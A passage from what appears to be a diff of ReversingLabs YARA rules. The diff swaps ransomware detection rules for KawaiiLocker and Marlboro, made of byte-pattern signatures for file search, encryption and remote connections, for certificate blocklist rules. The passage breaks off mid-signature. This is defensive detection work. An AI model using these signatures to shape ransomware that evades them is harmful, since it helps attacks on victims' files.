FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE { meta: - description = "Yara rule that detects KawaiiLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901" - date = "2020-08-17" - modified = "2020-08-17" + id = "b78e7f2b-8122-5df6-ad79-393db9e0498d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17106-L17122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "KawaiiLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files = { - 55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55 - ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? - ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 - ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D - ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D - 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? - FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D - ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D - 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? - FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? C3 - } - $remote_connection = { - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 - ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ?? - 8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 - ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 - ?? 8B 50 ?? 8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55 - ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ?? - ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? - 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files = { - 55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 - 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 - ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 - ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 - ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? - ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8 - } - condition: - uint16(0)==0x5A4D and $search_files and $encrypt_files and $remote_connection + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jin Yuguang" and pe.signatures[i].serial=="5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE { meta: - description = "Yara rule that detects Marlboro ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7cd3b436-47e3-5711-9b59-cef70efe3b45" - date = "2020-07-23" - modified = "2020-07-23" + id = "51e603bb-ef21-55e8-8f2b-94865f1213c9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17124-L17140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Marlboro" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $ping_apnic = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57 - C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_server_connection_1 = { - BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B - C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? - 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 - } - $remote_server_connection_2 = { - 84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D - ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? - ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 - 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B - 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 - } - $remote_server_connection_3 = { - 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 - ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F - 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? - EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 83 FB ?? 72 - } - $remote_server_connection_4 = { - 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D - ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B - C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? - ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 - CD E8 ?? ?? ?? ?? 8B E5 5D - } - $encrypt_file = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? - 8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ?? - ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ?? - 8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39 - 41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ?? - ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? - 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ?? - 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ?? - 8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 - ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 - C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 